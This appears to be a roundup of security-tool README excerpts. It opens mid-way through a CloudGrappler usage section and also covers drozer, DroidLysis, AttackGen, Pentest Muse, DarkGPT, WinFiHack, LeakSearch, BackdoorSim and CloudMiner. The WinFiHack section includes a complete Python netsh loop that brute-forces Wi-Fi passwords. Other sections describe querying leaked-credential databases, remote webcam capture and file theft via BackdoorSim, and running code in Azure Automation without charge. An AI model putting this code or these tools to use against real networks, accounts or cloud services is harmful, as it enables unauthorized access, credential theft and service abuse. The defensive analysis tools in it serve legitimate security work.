"testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
]
},
{
"bucket": "aws-kosova-us-east-1-00000000"
}
],
"AZURE": [
{
"accountname": "logs",
"container": [
"cloudgrappler"
]
}
]
}
Run command
python3 main.py
python3 main.py -p
[+] Running GetFileDownloadUrls.*secrets_ for AWS
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.
python3 main.py -p -jo
reports
└── json
    ├── AWS
    │   └── 2024-03-04 01:01 AM
    │       └── cloudtrail-logs-00000000-ffffff--
    │           └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    │               └── GetFileDownloadUrls.*secrets_.json
    └── AZURE
        └── 2024-03-04 01:01 AM
            └── logs
                └── cloudgrappler
                    └── okta_key.json
python3 main.py -p -sd 2024-02-15 -ed 2024-02-16
python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'
python3 main.py -f new_file.json
Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.
If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.
The simplest way to authenticate with Azure is to first run:
az login
This will open a browser window and prompt you to login to Azure.
AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.
If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! β
What's new? | Why is it useful? |
---|---|
Mistral API Integration | - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case. |
Local Model Support using Ollama | - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app |
Optional LangSmith Integration | - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith. |
Various Bug Fixes and Improvements | - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust. |
What's new? | Why is it useful? |
---|---|
Azure OpenAI Service Integration | - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements. - Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models. |
LangSmith for Azure OpenAI Service | - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios. - User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction. |
Model Selection for OpenAI API | - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview . This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case. |
Docker Container Image | - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform. |
What's new? | Why is it useful? |
---|---|
Custom Scenarios based on ATT&CK Techniques | - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group. - Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture. |
User feedback on generated scenarios | - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks. |
Improved error handling for missing API keys | - Improved user experience. |
Replaced Streamlit st.spinner widgets with new st.status widget | - Provides better visibility into long running processes (i.e. scenario generation). |
Initial release.
Requirements: the required Python packages (including langchain and mitreattack), plus the data files enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.
Installation:
git clone https://github.com/mrwadams/attackgen.git
cd attackgen
pip install -r requirements.txt
Or pull the Docker image:
docker pull mrwadams/attackgen
If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml
file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example
file in the .streamlit/
directory that you can use as a template for your own secrets.toml file.
If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml
file in place, but you can leave the LANGCHAIN_API_KEY
field empty.
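For instance, a minimal .streamlit/secrets.toml for running without LangSmith could contain nothing more than the empty key described above:
LANGCHAIN_API_KEY = ""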
Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Ensure to place this file in the ./data/
directory within the repository.
After the data setup, you can run AttackGen with the following command:
streamlit run 👋_Welcome.py
You can also try the app on Streamlit Community Cloud.
streamlit run 👋_Welcome.py
docker run -p 8501:8501 mrwadams/attackgen
This command will start the container and map port 8501 (the default for Streamlit apps) from the container to your host machine. Then open your web browser, navigate to http://localhost:8501, and use the app to generate standard or custom incident response scenarios (see below for details).
To generate a standard scenario, use the Threat Group Scenarios page (configuration such as API keys is supplied via the .streamlit/secrets.toml file). To generate a custom scenario, use the Custom Scenario page (again relying on the .streamlit/secrets.toml file). Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it in the app and also download it as a Markdown file.
I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.
This project is licensed under GNU GPLv3.
ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.
~ Hilali Abdel
USAGE
python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]
[Add new Device]
python3 smartthings.py -a 192.168.1.1
python3 smartthings.py -s --type TPLINK
python3 smartthings.py -s --firmware TP-Link Archer C7v2
Search for CVE and PoC [firmware and device type]
Scan device for open upnp ports
python3 smartthings.py -s --scan upnp --id
Get data from MQTT 'subscribe'
python3 smartthings.py -s --scan mqtt --id
drozer (formerly Mercury) is the leading security testing framework for Android.
drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).
drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.
drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/
To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.
Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.
Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python setup.py bdist_wheel
sudo pip install dist/drozer-2.x.x-py2-none-any.whl
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make deb
sudo dpkg -i drozer-2.x.x.deb
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make rpm
sudo rpm -I drozer-2.x.x-1.noarch.rpm
NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python.exe setup.py bdist_msi
Run dist/drozer-2.x.x.win-x.msi
Drozer can be installed using Android Debug Bridge (adb).
Download the latest Drozer Agent here.
$ adb install drozer-agent-2.x.x.apk
You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.
We will use the server embedded in the drozer Agent to do this.
If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:
$ adb forward tcp:31415 tcp:31415
Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.
Then, on your PC, connect using the drozer Console:
On Linux:
$ drozer console connect
On Windows:
> drozer.bat console connect
If using a real device, the IP address of the device on the network must be specified:
On Linux:
$ drozer console connect --server 192.168.0.10
On Windows:
> drozer.bat console connect --server 192.168.0.10
You should be presented with a drozer command prompt:
selecting f75640f67144d9a3 (unknown sdk 4.1.1)
dz>
The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.
You are now ready to start exploring the device.
Command | Description |
---|---|
run | Executes a drozer module |
list | Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run. |
shell | Start an interactive Linux shell on the device, in the context of the Agent process. |
cd | Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module. |
clean | Remove temporary files stored by drozer on the Android device. |
contributors | Displays a list of people who have contributed to the drozer framework and modules in use on your system. |
echo | Print text to the console. |
exit | Terminate the drozer session. |
help | Display help about a particular command or module. |
load | Load a file containing drozer commands, and execute them in sequence. |
module | Find and install additional drozer modules from the Internet. |
permissions | Display a list of the permissions granted to the drozer Agent. |
set | Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer. |
unset | Remove a named variable that drozer passes to any Linux shells that it spawns. |
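For example, modules are executed with the run command from the dz> prompt; assuming the standard app.package.list module is available, listing installed packages filtered by a keyword looks roughly like this:
dz> run app.package.list -f keyword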
drozer is released under a 3-clause BSD License. See LICENSE for full details.
drozer is Open Source software, made great by contributions from the community.
Bug reports, feature requests, comments and questions can be submitted here.
DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.
DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.
sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
Install the Android disassembly tools (Apktool, Baksmali, Dex2jar):
$ mkdir -p ~/softs
$ cd ~/softs
$ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
$ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
$ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
$ unzip dex-tools-v2.4.zip
$ rm -f dex-tools-v2.4.zip
Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments, etc.).
$ python3 -m venv venv
$ source ./venv/bin/activate
(venv) $ pip3 install git+https://github.com/cryptax/droidlysis
Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis
).
Update the configuration in conf/general.conf. In particular, make sure to change /home/axelle to your appropriate directories.
[tools]
apktool = /home/axelle/softs/apktool_2.9.3.jar
baksmali = /home/axelle/softs/baksmali-2.5.2.jar
dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
keytool = /usr/bin/keytool
...
python3 ./droidlysis3.py --help
The configuration file is ./conf/general.conf
(you can switch to another file with the --config
option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf
, ./conf/wide.conf
, ./conf/arm.conf
, ./conf/kit.conf
) and the name of the database file (only used if you specify --enable-sql
)
Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.
DroidLysis uses Python 3. To launch it and get options:
droidlysis --help
For example, test it on Signal's APK:
droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf
DroidLysis outputs:
- A sample output directory. With --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
- A database (droidlysis.db) containing properties it noticed.
Get usage with droidlysis --help
The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other types of files (unless there is a bug...) but won't be able to understand the content.
When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein
. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput
. If you want to store all statistics in a SQL database, use --enable-sql
(see here)
DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon
.
DroidLysis's analysis does not inspect known 3rd party SDKs by default, i.e. it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisement) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).
Sample output directory (--output DIR)
This directory contains (when applicable):
- AndroidManifest.xml
- res
- lib, assets
- smali (and others)
- META-INF
- ./unzipped
- classes.dex (and others), converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred
The following files are generated by DroidLysis:
- autoanalysis.md: lists each pattern DroidLysis detected and where.
- report.md: same as what was printed on the console.
If you do not need the sample output directory to be generated, use the option --clearoutput.
Import trackers from Exodus Privacy (--import-exodus)
$ python3 ./droidlysis3.py --import-exodus --verbose
Processing file: ./droidurl.pyc ...
DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf
Trackers from Exodus which are not present in your initial kit.conf
are appended to ~/.cache/droidlysis/kit.conf
. Diff the 2 files and check what trackers you wish to add.
If you want to process a directory of samples, you'll probably like to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql
. This will automatically dump all results in a database named droidlysis.db
, in a table named samples
. Each entry in the table is relative to a given sample. Each column is properties DroidLysis tracks.
For example, to retrieve all filename, SHA256 sum and smali properties of the database:
sqlite> select sha256, sanitized_basename, smali_properties from samples;
f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
...
What DroidLysis detects can be configured and extended in the files of the ./conf
directory.
A pattern consists of:
- A tag name, e.g. send_sms. This is to name the property. It must be unique across the .conf file.
- A pattern, which is a regular expression, e.g. ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is matched on Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
[send_sms]
pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
description=Sending SMS messages
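Following the same format, a hypothetical custom entry (not shipped with DroidLysis) could be added to smali.conf to flag clipboard reads, for example:
[read_clipboard]
pattern=;->getPrimaryClip
description=Reading the clipboard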
Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf
. Add option --import_exodus
to the droidlysis command line: this will parse existing trackers Exodus Privacy knows and which aren't yet in your kit.conf
. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf
.
Afterwards, you may want to sort your kit.conf
file:
import configparser
import collections
import os
config = configparser.ConfigParser({}, collections.OrderedDict)
config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
# Order all sections alphabetically
config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
with open('sorted.conf','w') as f:
config.write(f)
Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.
In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.
This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.
Install the required packages from requirements.txt:
git clone https://github.com/pentestmuse-ai/PentestMuse
cd PentestMuse
pip install -r requirements.txt
Install Pentest Muse as a Python Package:
pip install .
In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:
python run_app.py
or
pmuse
You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program in agent mode, you can use:
python run_app.py agent
or
pmuse agent
You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.
Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key]
when starting the program.
For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.
1. Download jython-standalone-2.7.3.jar.
2. Run java -jar jython-standalone-2.7.3.jar -m ensurepip.
3. Download GAP.py and requirements.txt from this project and place them in the same directory.
4. Run java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
.Or you can right click a request or response in any other context and select GAP from the Extensions menu.
If you don't need one of the modes, then un-check it as results will be quicker.
If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run for one or two targets in the Site Map view at a time, as huge projects can consume a lot of resources.
If you want to run GAP on one or more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.
It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl
button and click the GAP logo header image to remove it to make more space.
The Words mode uses the beautifulsoup4
library and this can be quite slow, so be patient!
Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.
NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.
Tentative future improvements include flagging potential issues, e.g. parameters that were found in the Response (but not as query parameters in links found), and finding an alternative to beautifulsoup4 that is faster to parse responses for Words.
/XNL-h4ck3r
DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.
Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.
First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:
git clone https://github.com/luijait/DarkGPT.git
cd DarkGPT
You will need to set up some environment variables for the script to work correctly. Copy the .env.example file to a new file named .env:
DEHASHED_API_KEY="your_dehashed_api_key_here"
This project requires certain Python packages to run. Install them by running the following command:
pip install -r requirements.txt
Then run the project:
python3 main.py
WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script, which uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack, but it needs no external libraries, just Python and Python scripts.
The packages are minimal or nearly none. The package install command is:
pip install rich pyfiglet
That's it.
Listing the features: a clean console UI built with rich.
So this is how the bruteforcer works:
Provide Interface:
The user is required to provide the network interface for the tool to use.
By default, the interface is set to Wi-Fi
.
Search and Set Target:
The user must search for and select the target network.
During this process, the tool performs the following sub-steps:
Input Password File:
The user inputs the path to the password file.
The default path for the password file is ./wordlist/default.txt
.
Run the Attack:
With the target set and the password file ready, the tool is now prepared to initiate the attack.
Attack Procedure:
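The detailed sub-steps live in the repository's main.py. Purely as a rough illustration of the netsh-based loop described above (add a profile containing the candidate password, attempt a connection, check the interface state), a hedged Python sketch might look like the following; the SSID, interface name, timing and wordlist path are assumptions, not WinFiHack's actual code:
import subprocess
import tempfile
import time

# Hypothetical sketch of a netsh-based Wi-Fi bruteforce loop (illustration only).
PROFILE = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>{ssid}</name>
  <SSIDConfig><SSID><name>{ssid}</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>manual</connectionMode>
  <MSM><security>
    <authEncryption>
      <authentication>WPA2PSK</authentication>
      <encryption>AES</encryption>
      <useOneX>false</useOneX>
    </authEncryption>
    <sharedKey>
      <keyType>passPhrase</keyType>
      <protected>false</protected>
      <keyMaterial>{password}</keyMaterial>
    </sharedKey>
  </security></MSM>
</WLANProfile>"""

def try_password(ssid, password, interface="Wi-Fi"):
    # Write a temporary WLAN profile containing the candidate password.
    with tempfile.NamedTemporaryFile("w", suffix=".xml", delete=False) as f:
        f.write(PROFILE.format(ssid=ssid, password=password))
        path = f.name
    # Load the profile and attempt to connect with it.
    subprocess.run(["netsh", "wlan", "add", "profile", f"filename={path}",
                    f"interface={interface}"], capture_output=True)
    subprocess.run(["netsh", "wlan", "connect", f"name={ssid}",
                    f"interface={interface}"], capture_output=True)
    time.sleep(5)  # give the adapter a moment to associate
    # Check whether the interface reports a connected state.
    state = subprocess.run(["netsh", "wlan", "show", "interfaces"],
                           capture_output=True, text=True).stdout
    for line in state.splitlines():
        if line.strip().lower().startswith("state"):
            return line.strip().lower().endswith(": connected")
    return False

if __name__ == "__main__":
    with open("./wordlist/default.txt", encoding="utf-8", errors="ignore") as wordlist:
        for candidate in wordlist:
            candidate = candidate.strip()
            if candidate and try_password("TargetSSID", candidate):
                print(f"[+] Password found: {candidate}")
                break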
After installing all the packages just run python main.py
The rest is history. Make sure you run this on Windows, because this won't work on any other OS. The interface looks like this:
For contributions: - First Clone: First clone the repo into your dev environment and do the edits. - Comments: I would appreciate it if you could add comments explaining your POV and also explaining the upgrade. - Submit: Submit a PR for me to verify the changes and approve it if necessary.
LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.
It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:
git clone https://github.com/JoelGMSec/LeakSearch
_ _ ____ _
| | ___ __ _| | __/ ___| ___ __ _ _ __ ___| |__
| | / _ \/ _` | |/ /\___ \ / _ \/ _` | '__/ __| '_ \
| |__| __/ (_| | < ___) | __/ (_| | | | (__| | | |
|_____\___|\__,_|_|\_\|____/ \___|\__,_|_| \___|_| |_|
------------------- by @JoelGMSec -------------------
usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]
options:
-h, --help show this help message and exit
-d DATABASE, --database DATABASE
Database used for the search (ProxyNova or LocalDataBase)
-k KEYWORD, --keyword KEYWORD
Keyword (user/domain/pass) to search for leaks in the DB
-n NUMBER, --number NUMBER
Number of results to show (default is 20)
-o OUTPUT, --output OUTPUT
Save the results as json or txt into a file
-p PROXY, --proxy PROXY
Set HTTP/S proxy (like http://localhost:8080)
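An illustrative run (keyword and output file name are placeholders) that queries the default ProxyNova database for a domain and saves the first 100 results as JSON could be:
python3 LeakSearch.py -k example.com -n 100 -o results.json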
https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
This tool has been created and designed from scratch by Joel GΓ‘mez Molina (@JoelGMSec).
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
New bug bounty (vulnerabilities) collector
# python3 main.py
*2024-02-20 16:14:47.836189*
1. Arbitrary File Reading due to Lack of Input Filepath Validation
- Feb 6th 2024 / High (CVE-2024-0964)
- gradio-app/gradio
- https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/
2. View Barcode Image leads to Remote Code Execution
- Jan 31st 2024 / Critical (CVE: Not yet)
- dolibarr/dolibarr
- https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/
(delimiter-based file database)
# vim feeds.db
1|2024-02-20 16:17:40.393240|7fe14fd58ca2582d66539b2fe178eeaed3524342|CVE-2024-0964|https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/
2|2024-02-20 16:17:40.393987|c6b84ac808e7f229a4c8f9fbd073b4c0727e07e1|CVE: Not yet|https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/
3|2024-02-20 16:17:40.394582|7fead9658843919219a3b30b8249700d968d0cc9|CVE: Not yet|https://huntr.com/bounties/d6cb06dc-5d10-4197-8f89-847c3203d953/
4|2024-02-20 16:17:40.395094|81fecdd74318ce7da9bc29e81198e62f3225bd44|CVE: Not yet|https://huntr.com/bounties/d875d1a2-7205-4b2b-93cf-439fa4c4f961/
5|2024-02-20 16:17:40.395613|111045c8f1a7926174243db403614d4a58dc72ed|CVE: Not yet|https://huntr.com/bounties/10e423cd-7051-43fd-b736-4e18650d0172/
BackdoorSim
is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer
and BackdoorClient
. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.
This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.
To set up BackdoorSim
, you will need to install it on both the server and client machines.
$ git clone https://github.com/HalilDeniz/BackDoorSim.git
$ cd BackDoorSim
$ pip install -r requirements.txt
After starting both the server and client, you can use the following commands in the server's command prompt:
- upload [file_path]: Upload a file to the client.
- download [file_path]: Download a file from the client.
- screenshot: Capture a screenshot from the client.
- sysinfo: Get system information from the client.
- securityinfo: Get security software status from the client.
- camshot: Capture an image from the client's webcam.
- notify [title] [message]: Send a notification to the client.
- help: Display the help menu.
If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool
If you want to read our article about Backdoor
Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.
For any inquiries or further information, you can reach me through the following channels:
SpeedyTest is a powerful command-line tool for measuring internet speed. With its advanced features and intuitive interface, it provides accurate and comprehensive speed test results. Whether you're a network administrator, developer, or simply want to monitor your internet connection, SpeedyTest is the perfect tool for the job.
git clone https://github.com/HalilDeniz/SpeedyTest.git
Before you can use SpeedyTest, you need to make sure that you have the necessary requirements installed. You can install these requirements by running the following command:
pip install -r requirements.txt
Run the following command to perform a speed test:
python3 speendytest.py
Receiving data \
Speed test completed!
Speed test time: 20.22 second
Server : Farknet - Konya
IP Address: speedtest.farknet.com.tr:8080
Country : Turkey
City : Konya
Ping : 20.41 ms
Download : 90.12 Mbps
Loading : 20 Mbps
Contributions are welcome! To contribute to SpeedyTest, follow these steps:
If you have any questions, comments, or suggestions about SpeedyTest, please feel free to contact me:
SpeedyTest is released under the MIT License. See LICENSE for details.
MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.
$ pip3 install colorama
$ pip3 install paramiko
$ git clone https://github.com/emrekybs/BlueFish.git
$ cd MrHandler
$ chmod +x MrHandler.py
$ python3 MrHandler.py
Execute code within Azure Automation service without getting charged
CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.
